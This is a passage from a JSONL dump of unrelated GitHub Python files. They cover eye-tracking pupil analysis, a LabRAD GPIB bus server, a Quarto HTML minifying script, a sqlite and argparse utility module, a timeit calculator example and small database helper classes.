np.subtract(np.nanmean(neutral_cueperiod['ave_x'],0),960), label = 'neutral cue', lw = 1, color = '#636363')\nplt.axvline(x=0.026,ls='dashed', color='k',lw=1)\nplt.axhline(y=0,ls='dashed', color='k', lw=1)\nplt.legend()\nplt.title('average x coordinate relative to cue')\n\n\nplt_left = cued_cueperiod['ave_x'][cued_cueperiod['info']['trigger']==cue_trigs['cued_left']]\nplt.figure()\nfor i in range(plt_left.shape[0]):\n plt.plot(timerange, np.subtract(plt_left[i,:],np.nanmean(plt_left[i,476:526])),lw=1, color = '#bdbdbd')\nplt.plot(timerange, np.subtract(np.nanmean(plt_left,0),np.nanmean(np.nanmean(plt_left,0)[476:526])),lw=1, color = '#fc8d59')\nplt.axvline(x=.026,ls='dashed',color='k',lw=2)\nplt.title('all trials, cued left, rel. to cue onset')\n\nplt.figure()\nplt.plot(timerange, np.nanmean(plt_left,0), label='cued left', lw=1, color = '#fc8d59')\nplt.axvline(x=0.026,lw=1,ls='dashed',color='k')\nplt.legend()\n\n\n# -----------------------------------------------------------------------------------------------------------------------\n#epoch and plot relative to feedback that people received\nbdata = pd.DataFrame.from_csv(param['behaviour'])\ntraces2epoch = ['lp','rp']\ntimewin = [-0.5, 1.5]\n\nbdata_nleft = bdata.query('fbtrig==76')\nbdata_cleft = bdata.query('fbtrig==78')\nbdata_nright = bdata.query('fbtrig==77')\nbdata_cright = bdata.query('fbtrig==79')\n\n\n#watch out when epoching around the feedback, because the final trials feedback will be messed up if you dont wait out at the end of the task!\nfeedback_trigs = dict(neutral_left='trig76', neutral_right='trig77', cued_left='trig78', cued_right='trig79', neutral=['trig76','trig77'], cued=['trig78','trig79'])\n\ncued_fb_epoch = bce.epoch(data, trigger_values = feedback_trigs['cued'], traces = ['lp', 'rp'], twin = timewin, srate=1000)\nneutral_fb_epoch = bce.epoch(data, trigger_values = feedback_trigs['neutral'], traces = ['lp', 'rp'], twin = timewin, srate=1000)\n\n#get all feedback events\nfb_epochs = bce.epoch(data, trigger_values = ['trig76', 'trig77', 'trig78', 'trig79'], traces = ['lp', 'rp'], twin=timewin,srate=1000)\nfb_epochs = bce.apply_baseline( fb_epochs, traces=['lp', 'rp'], baseline_window = [-0.1,0.0], mode='mean' ) #baseline\nfb_epochs = bce.average_eyes(fb_epochs, traces = ['p'])\n\n#baseline pupil data\ncued_fb_epoch = bce.apply_baseline(cued_fb_epoch, traces = ['lp', 'rp'], baseline_window = [-0.1,0.0], mode='mean')\nneutral_fb_epoch = bce.apply_baseline(neutral_fb_epoch, traces = ['lp', 'rp'], baseline_window = [-0.1,0.0], mode='mean')\n\n#average pupil data across the two eyes\ncued_fb_epoch = bce.average_eyes(cued_fb_epoch , traces = ['p'])\nneutral_fb_epoch = bce.average_eyes(neutral_fb_epoch, traces = ['p'])\n\n\n#plotting\ntwin_srate = np.multiply([timewin[0], timewin[1]],fb_epochs['info']['srate']).astype(int)\ntimerange = np.divide(np.arange(twin_srate[0],twin_srate[1],1,dtype=float),fb_epochs['info']['srate'])\n\n#just plot the average for now, no separation by any behavioural information\nplt.figure()\nplt.plot(timerange, np.nanmean(cued_fb_epoch['ave_p'],0), label = 'cued' , lw = 1, color = '#3182bd') #blue for cued\nplt.plot(timerange, np.nanmean(neutral_fb_epoch['ave_p'],0), label = 'neutral', lw = 1, color = '#bdbdbd') #grey for neutral\nplt.axvline(x = 0.0, lw = 1, ls = 'dashed', color = 'k')\nplt.axvline(x = 0.5, lw = 1, ls = 'dashed', color = 'k', label = 'feedback offset')\nplt.axvline(x = 1.5, lw = 1, ls = 'dashed', color = 'r', label = 'minimum onset of next trial')\nplt.legend()\nplt.title('pupil dilation rel. to feedback onset')\n\n\n#sys.path.insert(0, '/Users/sammi/Desktop/Experiments/DPhil/glm')\nsys.path.insert(0, '/home/sammirc/Desktop/DPhil/glm')\nimport glmtools as glm\ncued_bdata = bdata.query('cond==\\'cued\\'') #get the cued behavioural data\n\n#glmdata = glm.data.TrialGLMData(data= cued_fb_epoch['ave_p'], time_dim=1, sample_rate=1000)\nglmdata = glm.data.TrialGLMData(data = fb_epochs['ave_p'], category_list = bdata.cue.to_numpy(), time_dim=1, sample_rate=1000)\n\nregressors = list()\nregressors.append( glm.regressors.ParametricRegressor(name= 'confdiff', values = bdata.confdiff.to_numpy(), preproc='z', num_observations = glmdata.num_observations))\nregressors.append( glm.regressors.CategoricalRegressor(category_list = bdata.cue.to_numpy(), codes = 0))\nregressors.append( glm.regressors.CategoricalRegressor(category_list = bdata.cue.to_numpy(), codes = 1))\n#regressors.append( glm.regressors.CategoricalRegressor(category_list = bdata.cue.to_numpy(), codes = (0,1)) )\n#regressors.append( glm.regressors.ParametricRegressor(name = 'condition comparison', values = bdata.cue.to_numpy(), num_observations = glmdata.num_observations) )\ncuecond = bdata.cue.to_numpy()\ncuecond = np.where(cuecond==0, -1,cuecond)\nregressors.append( glm.regressors.ParametricRegressor(name = 'condition x confdiff', values = np.multiply(bdata.confdiff.to_numpy(), cuecond), num_observations=glmdata.num_observations))\n\n\n\ncontrasts = list()\ncontrasts.append( glm.design.Contrast([1, 0, 0, 0], 'confidence deviation'))\ncontrasts.append( glm.design.Contrast([0, 1, 0, 0], 'neutral'))\ncontrasts.append( glm.design.Contrast([0, 0, 1, 0], 'cued'))\ncontrasts.append( glm.design.Contrast([0, 0, 0, 1], 'condition x confdiff'))\n\nftests = list()\nftests.append( glm.design.FTest( [0,1,1,0], 'mean condition') )\n\n\n\nglmdes = glm.design.GLMDesign.initialise(regressors, contrasts, ftests)\nprint(glmdes.ftest_names)\n\nglmdes.plot_summary()\n\nmodel = glm.fit.OLSModel( glmdes, glmdata )\n\n#i'm pretty sure that here the middle plot is plotting the beta coefficients across the length of the time series to show where the effect starts to emerge (which is awesome)\nplt.figure()\nplt.subplot(311)\nplt.plot(timerange, model.copes.T,lw=1) \nplt.legend(glmdes.contrast_names, loc = 'upper left', ncol=2)\nplt.title('COPEs')\nplt.subplot(312)\nplt.plot(timerange, model.get_tstats().T, lw=1)\nplt.axhline(y=0, ls='dashed', color='k', lw=1)\nplt.axhline(y=2.58, ls='dashed', color = '#bdbdbd') #2.58 tstat line for significance\nplt.axhline(y=-2.58, ls='dashed', color = '#bdbdbd') #2.58 tstat line for significance\nplt.legend(glmdes.contrast_names, loc = 'upper left', ncol=2)\nplt.title('t-stats')\nplt.subplot(313)\nplt.plot(timerange, np.nanmean(cued_fb_epoch['ave_p'],0), label = 'cued' , lw = 1, color = '#3182bd') #blue for cued\nplt.plot(timerange, np.nanmean(neutral_fb_epoch['ave_p'],0), label = 'neutral', lw = 1, color = '#bdbdbd') #grey for neutral\nplt.axvline(x = 0.0, lw = 1, ls = 'dashed', color = 'k')\nplt.axvline(x = 0.5, lw = 1, ls = 'dashed', color = 'k', label = 'feedback offset')\nplt.axvline(x = 1.5, lw = 1, ls = 'dashed', color = 'r', label = 'minimum onset of next trial')\nplt.legend()\nplt.title('pupil dilation rel. to feedback onset')\nplt.show()\n\n\nplt.figure()\nplt.plot(timerange,model.fstats.T)\nplt.legend(glmdes.ftest_names)\nplt.title('FTests')\n","repo_name":"schekroud/wmconfidence_eeg","sub_path":"analysis_scripts/py/04_WMC_eyetracking.py","file_name":"04_WMC_eyetracking.py","file_ext":"py","file_size_in_byte":12082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23127764890","text":"# CHANGELOG\n#\n# 2011 December 10 - Peter O'Malley & Jim Wenner\n#\n# Fixed bug where doesn't add devices if no SOCKETS connected.\n#\n# 2011 December 5 - Jim Wenner\n#\n# Added ability to read TCPIP (Ethernet) devices if configured to use\n# sockets (i.e., fixed port address). To do this, added getSocketsList\n# function and changed refresh_devices.\n#\n# 2011 December 3 - Jim Wenner\n#\n# Added ability to read TCPIP (Ethernet) devices. Must be configured\n# using VXI-11 or LXI so that address ends in INSTR. Does not accept if\n# configured to use sockets. To do this, changed refresh_devices.\n#\n# To be clear, the gpib system already supported ethernet devices just fine\n# as long as they weren't using raw socket protocol. The changes that\n# were made here and in the next few revisions are hacks to make socket\n# connections work, and should be improved.\n#\n# 2021 October 17 - Clayton Ho\n# Added back automatic device polling\n# 2021 November 25 - Clayton Ho\n# Added configurable device polling\n# 2021 December 15 - Clayton Ho\n# Subclassed it from PollingServer to support polling\n# instead of using server methods\n\n\n\"\"\"\n### BEGIN NODE INFO\n[info]\nname = GPIB Bus\nversion = 1.5.2\ndescription = Gives access to GPIB devices via pyvisa.\ninstancename = %LABRADNODE% GPIB Bus\n\n[startup]\ncmdline = %PYTHON% %FILE%\ntimeout = 20\n\n[shutdown]\nmessage = 987654321\ntimeout = 100\n### END NODE INFO\n\"\"\"\n\nfrom labrad.units import WithUnit\nfrom labrad.server import setting\nfrom labrad.errors import DeviceNotSelectedError\n\nfrom twisted.internet.defer import returnValue, inlineCallbacks\n\nimport pyvisa as visa\nfrom pyvisa_SimulatedInstrumentBackend import SimulatedInstrumentResource\n\nfrom UCLA_CS_labrad.servers import PollingServer\n\n\n\n\nKNOWN_DEVICE_TYPES = ('GPIB', 'TCPIP', 'USB','SIM')\n\n\nclass GPIBBusServer(PollingServer):\n \"\"\"\n Provides direct access to GPIB-enabled devices.\n \"\"\"\n\n name = '%LABRADNODE% GPIB Bus'\n defaultTimeout = WithUnit(1.0, 's')\n POLL_ON_STARTUP = True\n\n @inlineCallbacks \n def initServer(self):\n super().initServer()\n self.devices = {}\n self.sim_addresses=[]\n self.HSS=None\n servers=yield self.client.manager.servers()\n \n #HSS already running case\n if 'Hardware Simulation Server' in [HSS_name for _,HSS_name in servers]:\n yield self.client.refresh()\n self.HSS=self.client.servers['Hardware Simulation Server']\n yield self.HSS.signal__device_added(8675311)\n yield self.HSS.signal__device_removed(8675312)\n #GPIB Bus Servers subscribe to two types of LabRAD Signals of this Hardware Simulation Server (HSS) while booting up: device addition and device removal LabRAD Signals.\n yield self.HSS.addListener(listener=self.simDeviceAdded,source = None,ID=8675311)\n yield self.HSS.addListener(listener=self.simDeviceRemoved, source=None, ID=8675312) #assign handlers\n self.rm_phys = visa.ResourceManager()\n \n #second ResourceManager used in the GPIB Bus Server’s polls with a new backend (found in pyvisa_SimulatedInstrumentBackend),\n #where resources are simulated GPIB instruments in the HSS.\n #This backend is essentially a wrapper over the HSS API (settings), instead of a wrapper over the NI-VISA driver.\n #When a ResourceManager with a default backend creates a Resource object to return to a caller of its open_resource method,\n #it uses the provided resource name to determine what subclass of the base Resource class to return. For all the real GPIB devices,\n #it returns a MessageBasedResource object; thus, this object is what is always stored in a GPIB Bus Server’s client’s\n #context dictionary when they make an address (select) request. one can override the process ResourceManager uses to pick the\n #type of Resource object to return, and provide their own Resource subclass instead. We write our own Resource subclass,\n #called SimulatedInstrumentResource (which can be seen in pyvisa_SimulatedInstrumentBackend); this way we have to implement\n #less methods in the new backend and essentially have more control over how each method call on the client’s Resource object\n #acted from top to bottom, only using the PyVISA functionality to take care of getting Resources and managing VISA sessions.\n #even if this means we’re mostly just doing glorified duck-typing, using the PyVISA infrastructure of Resources and backends\n #in the GPIB Bus Server code provides the opportunity to move closer towards using the actual MessageBasedResource objects\n #with our new backend, by editing the separate file with the implementation of SimulatedInstrumentResource and the new backend.\n\n self.rm_sim = visa.ResourceManager('l@SimulatedInstrumentBackend')\n default_session=self.rm_sim.session #default resource manager session\n \n #pass tools to backend to communicate with HSS\n self.rm_sim.visalib.set_attribute(default_session,'cli',self.client)\n self.rm_sim.visalib.set_attribute(default_session,'ser',self.HSS)\n self.rm_sim.visalib.set_attribute(default_session,'node',self.name)\n # load the reference to the simulated_device_list into the new backend as its “resource collection”\n self.rm_sim.visalib.set_attribute(default_session,'sim_addresses',self.sim_addresses) #TODO: should be able to compact to one line by passing parameters when initializing resource manager\n self.refreshDevices()\n\n \n \n def _poll(self):\n self.refreshDevices()\n\n def refreshDevices(self):\n \"\"\"\n Refresh the list of known devices on this bus.\n Currently supported are GPIB devices and GPIB over USB.\n \"\"\"\n try:\n #instead of polling the simulated_device_list directly, and instantiating our own object for each new simulated device,\n #we have both the ResourceManagers list their resources at the same time.\n #Then, for each new resource name, we could get the Resource from the appropriate ResourceManager\n #and put it in the resource dictionary.\n addresses = [str(x) for x in self.rm_phys.list_resources()+self.rm_sim.list_resources()]\n additions = set(addresses) - set(self.devices.keys())\n deletions = set(self.devices.keys()) - set(addresses)\n \n for addr in additions:\n try:\n if not addr.startswith(KNOWN_DEVICE_TYPES):\n continue\n \n\n instr = self.get_resource(addr)\n instr.write_termination = ''\n instr.clear()\n if addr.endswith('SOCKET'):\n instr.write_termination = '\\n'\n self.devices[addr] = instr\n self.sendDeviceMessage('GPIB Device Connect', addr)\n except Exception as e:\n print('Failed to add ' + addr + ':' + str(e))\n raise\n for addr in deletions:\n self.devices[addr].close()\n del self.devices[addr]\n self.sendDeviceMessage('GPIB Device Disconnect', addr)\n \n except Exception as e:\n print('Problem while refreshing devices:', str(e))\n raise e\n \n def get_resource(self,address):\n try:\n return self.rm_phys.open_resource(address,resource_pyclass=MessageBasedResource) #try opening physical resource\n except:\n return self.rm_sim.open_resource(address,resource_pyclass=SimulatedInstrumentResource) #if this fails, try simulated\n \n def sendDeviceMessage(self, msg, addr):\n print(msg + ': ' + addr)\n self.client.manager.send_named_message(msg, (self.name, addr))\n\n\n def getDevice(self, c):\n if 'addr' not in c:\n raise DeviceNotSelectedError(\"No GPIB address selected.\")\n if c['addr'] not in self.devices:\n raise Exception('Could not find device ' + c['addr'])\n instr = self.devices[c['addr']]\n return instr\n\n @setting(0, addr='s', returns='s')\n def address(self, c, addr=None):\n \"\"\"\n Get or set the GPIB address for this context.\n\n To get the addresses of available devices,\n use the list_devices function.\n \"\"\"\n if addr is not None:\n c['addr'] = addr\n return c['addr']\n\n @setting(2, time='v[s]', returns='v[s]')\n def timeout(self, c, time=None):\n \"\"\"\n Get or set the GPIB timeout.\n \"\"\"\n if time is not None:\n self.getDevice(c).timeout=time['ms']\n return WithUnit(self.getDevice(c).timeout/1000.0,'s')\n\n @setting(3, data='s', returns='')\n def write(self, c, data):\n \"\"\"\n Write a string to the GPIB bus.\n \"\"\"\n yield self.getDevice(c).write(data)\n\n @setting(8, data='y', returns='')\n def write_raw(self, c, data):\n \"\"\"\n Write a string to the GPIB bus.\n \"\"\"\n yield self.getDevice(c).write_raw(data)\n\n @setting(4, n_bytes='w', returns='s')\n def read(self, c, n_bytes=None):\n \"\"\"\n Read from the GPIB bus.\n\n Termination characters, if any, will be stripped.\n This includes any bytes corresponding to termination in\n binary data. If specified, reads only the given number\n of bytes. Otherwise, reads until the device stops sending.\n \"\"\"\n instr = self.getDevice(c)\n if n_bytes is None:\n ans = yield instr.read_raw()\n else:\n ans = yield instr.read_bytes(n_bytes)\n ans = ans.strip().decode()\n returnValue(ans)\n\n\n #TODO: Update to use resource object's query method\n @setting(5, data='s', returns='s')\n def query(self, c, data):\n \"\"\"\n Make a GPIB query, a write followed by a read.\n\n This query is atomic. No other communication to the\n device will occur while the query is in progress.\n \"\"\"\n instr = self.getDevice(c)\n yield instr.write(data)\n ans = yield instr.read_raw()\n # convert from bytes to string for python 3\n ans = ans.strip().decode()\n returnValue(ans)\n\n @setting(7, n_bytes='w', returns='y')\n def read_raw(self, c, n_bytes=None):\n \"\"\"\n Read raw bytes from the GPIB bus.\n\n Termination characters, if any, will not be stripped.\n If n_bytes is specified, reads only that many bytes.\n Otherwise, reads until the device stops sending.\n \"\"\"\n instr = self.getDevice(c)\n if n_bytes is None:\n ans = yield instr.read_raw()\n else:\n ans = yield instr.read_bytes(n_bytes)\n returnValue(bytes(ans))\n\n @setting(20, returns='*s')\n def list_devices(self, c):\n \"\"\"\n Get a list of devices on this bus.\n \"\"\"\n return sorted(self.devices.keys())\n\n @setting(21)\n def refresh_devices(self, c):\n \"\"\"\n Manually refresh devices.\n \"\"\"\n self.refreshDevices()\n\n def _poll_fail(self, failure):\n print('Polling failed.')\n\n \n # SIGNALS\n @inlineCallbacks\n def serverConnected(self, ID, name):\n \"\"\"\n Attempt to connect to last connected serial bus server upon server connection.\n \"\"\"\n # case where HSS started after this bus server\n if name=='Hardware Simulating Server':\n yield self.client.refresh()\n self.HSS=self.client.servers['Hardware Simulating Server']\n\t\t\t\n yield self.HSS.signal__device_added(8675311)\n yield self.HSS.signal__device_removed(8675312)\n yield self.HSS.addListener(listener=self.simDeviceAdded,source = None,ID=8675311)\n yield self.HSS.addListener(listener=self.simDeviceRemoved, source=None, ID=8675312)\n default_session=self.rm_sim.session\n self.rm_sim.visalib.set_attribute(default_session,'ser',self.HSS)\n \n # SIGNALS\n @inlineCallbacks\n def serverDisconnected(self, ID, name):\n if name=='Hardware Simulating Server':\n self.sim_addresses.clear() #all sim addresses removed\n yield self.HSS.removeListener(listener=self.simDeviceAdded,source = None,ID=8675311)\n yield self.HSS.removeListener(listener=self.simDeviceRemoved, source=None, ID=8675312)\n self.HSS=None\n \n \n #see settings with same names in SBS\n @setting(71, 'Add Simulated Device', address='i', device_type='s',returns='')\n def add_simulated_device(self, c, address,device_type):\n if self.HSS:\n yield self.HSS.add_device(self.name,address,device_type,True)\n \n @setting(72, 'Remove Simulated Device', address='i', returns='')\n def remove_simulated_device(self, c, address):\n if self.HSS:\n yield self.HSS.remove_device(self.name,address)\n\n\n def simDeviceAdded(self, c,data):\n node, address=data\n if node==self.name:\n self.sim_addresses.append(address)\n \n def simDeviceRemoved(self, c, data):\n node, address=data\n if node==self.name:\n self.sim_addresses.remove(address)\n \n \n__server__ = GPIBBusServer()\n\nif __name__ == '__main__':\n from labrad import util\n util.runServer(__server__)\n","repo_name":"UCLALabRAD/LaSER-Project","sub_path":"UCLA_CS_labrad/servers/gpib/gpib_bus_server.py","file_name":"gpib_bus_server.py","file_ext":"py","file_size_in_byte":13466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34521077141","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport re\n\ndef load_page(page_path):\n with open(page_path, \"r\", encoding=\"utf-8\") as f:\n soup = BeautifulSoup(f, \"html.parser\")\n return soup\n\n# 1. Remove all script tags but keep their src\ndef get_script_links(soup):\n script_links = []\n for script in soup.findAll(\"script\"):\n if script.has_attr(\"src\"):\n script_links.append(script.attrs[\"src\"])\n script.decompose()\n return script_links\n\n# 2. Move quarto-html-after-body and any other scripts to files\n# so they're not loaded before htmlwidgets etc. are loaded\ndef get_body_scripts(soup, page_name):\n body_scripts = []\n for i, script in enumerate(soup.html.body.findAll(\"script\")):\n # don't copy the data scripts here\n if not script.has_attr(\"data-for\"):\n if script.has_attr(\"id\"):\n out_file = f\"./{page_name}_files/libs/{script.attrs['id']}.js\"\n else:\n out_file = f\"./{page_name}_files/libs/body_script_{i}.js\"\n with open(out_file, \"w\", encoding= \"utf-8\") as f:\n f.write(script.get_text()) \n body_scripts.append(out_file)\n script.decompose()\n return body_scripts\n\n# 3. Remove the hardcoded json data and write to file\ndef remove_json_data(json_tag, page_name):\n Path(f\"./{page_name}_files/data/\").mkdir(exist_ok=True)\n el_id = json_tag.attrs['data-for']\n with open(f\"./{page_name}_files/data/{el_id}.json\", \"w\", encoding=\"utf-8\") as f:\n f.write(json_tag.get_text()) \n json_tag.string.replace_with(\"\")\n return el_id\n\n# 4. Create the javascript to load the data and scripts\ndef create_load_data_js(soup, page_name):\n script_links = get_script_links(soup)\n body_scripts = get_body_scripts(soup, page_name)\n json_tags = [script for script in soup.findAll(\"script\") if script.has_attr(\"data-for\")]\n el_ids = [remove_json_data(json_tag, page_name) for json_tag in json_tags] \n\n load_function = \"\"\"\n const loadScript = (file_url, async = true, type = \"text/javascript\", appendToHead = true) => {\n return new Promise((resolve, reject) => {\n try {\n const scriptEle = document.createElement(\"script\");\n scriptEle.type = type;\n scriptEle.async = async;\n scriptEle.src = file_url;\n scriptEle.addEventListener(\"load\", (ev) => {\n resolve({ status: true });\n });\n scriptEle.addEventListener(\"error\", (ev) => {\n reject({\n status: false,\n message: `Failed to load the script ${file_url}`\n });\n });\n appendToHead ? document.head.appendChild(scriptEle) : document.body.appendChild(scriptEle);\n } catch (error) {\n reject(error);\n }\n });\n };\n \"\"\"\n\n load_data_first_element = f\"\"\"\n fetch(\"./{page_name}_files/data/{el_ids[0]}.json\")\n .then((response) => response.json())\n .then(\n (json) =>\n (document.querySelectorAll('[data-for=\"{el_ids[0]}\"]')[0].innerHTML =\n JSON.stringify(json).replaceAll(\"/\", \"/\"))\n )\n \"\"\"\n\n load_data_all_elements = [f\"\"\"\n .then(() => fetch(\"./{page_name}_files/data/{el_id}.json\"))\n .then((response) => response.json())\n .then(\n (json) =>\n (document.querySelectorAll('[data-for=\"{el_id}\"]')[0].innerHTML =\n JSON.stringify(json).replaceAll(\"/\", \"/\"))\n )\n \"\"\" for el_id in el_ids]\n\n if(len(el_ids) > 1):\n load_data_all_elements.pop(0)\n load_data_next_elements = \"\".join(load_data_all_elements)\n else:\n load_data_next_elements = \"\"\n\n then_load_scripts = \"\\n\".join([f'.then(() => loadScript(\"{script}\"))' for script in script_links])\n then_body_scripts = \"\\n\".join([f'.then(() => loadScript(\"{script}\"))' for script in body_scripts])\n then_render_mermaid = \".then(() => window.mermaid.init())\" # mermaid charts will not render otherwise\n then_render_html = \".then(() => window.HTMLWidgets.staticRender());\"\n\n script_content = f\"\"\"\n {load_function}\n {load_data_first_element}\n {load_data_next_elements}\n {then_load_scripts}\n {then_body_scripts}\n {then_render_mermaid}\n {then_render_html}\n \"\"\"\n return script_content\n\ndef insert_main_js_script(soup, page_name):\n load_data_js = create_load_data_js(soup, page_name)\n s = soup.new_tag(\"script\")\n s.string = load_data_js \n soup.html.head.append(s) \n\ndef save_new_html(soup, page_name):\n outfile = f\"{page_name}_min.html\"\n with open(outfile, \"w\", encoding='utf-8') as file:\n file.write(str(soup))\n print(f\"File created: {outfile}\")\n\ndef create_page_min(page_path):\n soup = load_page(page_path)\n page_name = re.sub(\"\\\\.html$\", \"\", page_path.name)\n print(f\"Converting {page_path}\")\n insert_main_js_script(soup, page_name)\n save_new_html(soup, page_name)\n\ndef make_all_html_min(files_to_exclude = [\"example_file_to_exclude.html\"]):\n # .endswith(\"min\") is quick and dirty shortcut to not apply this script to files it creates\n files_to_make_min = [f for f in Path(\"./\").glob(\"*.html\") if not f.name.endswith(\"min.html\")]\n files_to_make_min = list(set(files_to_make_min) - set([Path(f) for f in files_to_exclude]))\n\n print(\"This script will create a minimal version of the following files:\"\"\")\n for file in files_to_make_min:\n print(f\" - {file.name}\")\n input(\"To continue press any key or to cancel press Ctrl+C\")\n \n for page_path in files_to_make_min:\n create_page_min(page_path)\n\nmake_all_html_min()\n\n","repo_name":"samrickman/goltc-dsn-maps-cartograms-blog","sub_path":"3__remove_hardcoded_data.py","file_name":"3__remove_hardcoded_data.py","file_ext":"py","file_size_in_byte":5713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21515769023","text":"'''\nName: custom_functions.py\nVersion: 1.0\nDescription:\nRelease_date:\nUpdated_date:\nAuthor:\n\nRelease note:\n 1.0 - removing bugs...\n 0.2beta - ....\n 0.1beta - ....\n \n\n'''\n\n\n# Importamos las librerías de sistema\nimport sys\nimport os\nimport json\nimport logging\n\nfrom argparse import ArgumentParser\nfrom datetime import datetime, timezone\nfrom time import sleep\nimport requests\nimport pandas as pd\nimport numpy as np\nimport sqlite3\n\n\n#import load_dotenv\n\n# Ruta del sistema\n\nsys.path.append(\n os.path.abspath(os.path.join(\n os.path.dirname(__file__), os.path.pardir\n ))\n)\n\nenv_path = os.path.join('setup', '.env')\n#load_dotenv(env_path)\n\n# Configuramos el formato del logger\nFORMAT = '%(asctime)-15s - %(message)s'\nlogging.basicConfig(format=FORMAT\n ,level=logging.INFO\n ,filemode='w'\n )\nlogger = logging.getLogger(\"main.py\")\nlogger.setLevel(\"INFO\")\n\n\n# Definimos los argumentos o parámetros \n\ndef get_args():\n '''\n Recogemos los argumentos del script main.py\n '''\n global options\n logger.info(\"--- Get args initialized ---\")\n parser = ArgumentParser(description=\"Get args from main.py\")\n parser.add_argument('--env', default='DEV',\n choices=['DEV','QA','PRO'], type=str,\n required=True, help='Please select the environment')\n parser.add_argument('-ds', '--data_source', \n default=1, type=int,\n required=False, help=\"\"\"\n Select type of data source:\n '1' : 'BostonHousing',\n '2': 'Iris',\n '3' : 'Titanic'\n \"\"\"\n )\n parser.add_argument('--dbtable', type=str)\n options = parser.parse_args()\n logger.info(\"--- Get args loaded --- \\n\")\n \n \nclass TheBridgeDatabase():\n \n '''\n Creamos la clase TheBridgeDatabase..\n '''\n \n def __init__(self, env):\n '''\n Args:\n ----\n creds_file: from config dictionary values\n Return:\n ------\n credenciales variables for database\n '''\n self.environment = env\n # self.db_endpoint, self.db_port, self.db_name, self.db_schema, self.db_user, self.db_pass = creds_file.values() #noqa\n # self.uri = f'mssql+pymssql://{self.db_user}:{self.db_pass}@{self.db_endpoint}:{self.db_port}/{self.db_name}' #noqa\n # self.engine = create_engine(self.uri)\n print(self.environment)\n logger.info(f\"--- {TheBridgeDatabase.__name__} has been initialized ---\")\n \n \n def create_database_sqlite(self, path=None):\n self.conn = sqlite3.connect(f'thebridge_dwh_{self.environment}.db')\n cursor = self.conn.cursor()\n with open('src/data/raw/practica_sql_script_erp.sql', 'r') as q:\n sql = q.read()\n cursor.executescript(sql)\n return cursor\n\n def read_table(self, table_name=None):\n self.tables = pd.read_sql(f\"\"\" select *\n from sqlite_master \n where type='table' and\n name = '{table_name}'\n order by name;\n \"\"\", self.conn)\n return self.tables\n\n \n \n\n# with open('BBDD_ERP_data.sql', 'r') as q:\n# sql = q.read()\n# cursor.executescript(sql)\n \n# pd.read_sql(\"\"\" select *\n# from sqlite_schema\n# \"\"\", conn)\n\ndef remove_kg(row, custom_attr):\n row = row.lower()\n if 'kg' in row:\n return float(row.split('kg')[0])\n else:\n return float(row)\n \ndf['Weight'].apply(remove_kg, custom_attr)","repo_name":"jsanz81/001","sub_path":"week21/proyecto/src/utils/custom_functions (con parte creacion BD).py","file_name":"custom_functions (con parte creacion BD).py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7284504347","text":"# coding: utf-8\n\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy.ext.declarative import declared_attr\n\nfrom marco.ext import db\n\n\nclass Base(db.Model):\n\n __abstract__ = True\n\n def __repr__(self):\n attrs = ('%s=%r' % (attr.key, attr.value) for attr in inspect(self).attrs)\n attrs_str = ', '.join(attrs)\n return '%s(%s)' % (self.__class__.__name__, attrs_str)\n\n @declared_attr\n def id(cls):\n return db.Column(db.Integer, primary_key=True)\n","repo_name":"tonicbupt/marco","sub_path":"marco/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3467106426","text":"from timeit import timeit\n#import timeit\nimport _collections\n\nclass Calculadora():\n \"\"\"As variaveis são declaradas aqui\"\"\"\n def __init__(self, x,y):\n self.UNO = x\n self.DUO = y\n\n\n def soma(self):\n \"\"\"Esta Classe assim como todas as outras Usam as variaveis declaradas em __init__ da Classe\"\"\"\n somar = self.UNO + self.DUO\n return somar\n #print(somar)\n\n def subtrai(self):\n \"\"\"Neste caso UNO e DUO\"\"\"\n sub = self.UNO - self.DUO\n return sub\n\n\ns = Calculadora(120, 12)\n#Acessamos as funções que lidam com os valores que foram dados á Classe\nprint(\"\", s.soma(), \"\\n\", s.subtrai())\n\n\n#Testa quanto tempo cada função gasta para o processamento:\nprint(timeit('s.subtrai()', globals=globals()))\nprint(timeit('s.soma()', globals=globals()))\n\n#print(globals())\n\n\"\"\"\nclass Dog:\n\n def __init__(self, nome, idade):\n self.NOME = nome\n self.IDADE = idade\n\n\nbob = Dog('Bob', 11)\nprint(bob.NOME, bob.IDADE)\n\"\"\"\n","repo_name":"DiksonSantos/GeekUniversity_Python","sub_path":"Aula_175_Optimizacoes.py","file_name":"Aula_175_Optimizacoes.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31919308967","text":"import os\nimport errno\n# import psycopg2 as pg\n# import pandas.io.sql as psql\n\n\nclass DBControl:\n '''\n DB control class.\n '''\n\n def __init__(self, con_str: str = None):\n if con_str is None:\n raise ValueError(\n errno.EINVAL, os.strerror(errno.EINVAL), 'con_str')\n self.__con_str = con_str\n\n # Getter\n\n def get_con_str(self):\n return self.__con_str\n\n def set_con_str(self, con_str: str = None):\n if con_str is None:\n raise ValueError(\n errno.EINVAL, os.strerror(errno.EINVAL), 'con_str')\n self.__con_str = con_str\n return self\n\n # private method\n\n def __get_connection(self):\n import psycopg2 as pg\n return pg.connect(self.get_con_str())\n\n # public method\n\n def get_db_dataframe(self, sql: str = None, param: dict = None):\n import pandas.io.sql as psql\n if sql is None:\n raise ValueError(\n errno.EINVAL, os.strerror(errno.EINVAL), 'sql')\n if param is None:\n param = {}\n\n with self.__get_connection() as con:\n df = psql.read_sql(sql, con, params=param)\n return df\n\n\nif __name__ == '__main__':\n print()\n","repo_name":"cheshirewara/pydbope","sub_path":"dboperation/DBControlClass.py","file_name":"DBControlClass.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72258806453","text":"\"\"\"Define the adapters of the key 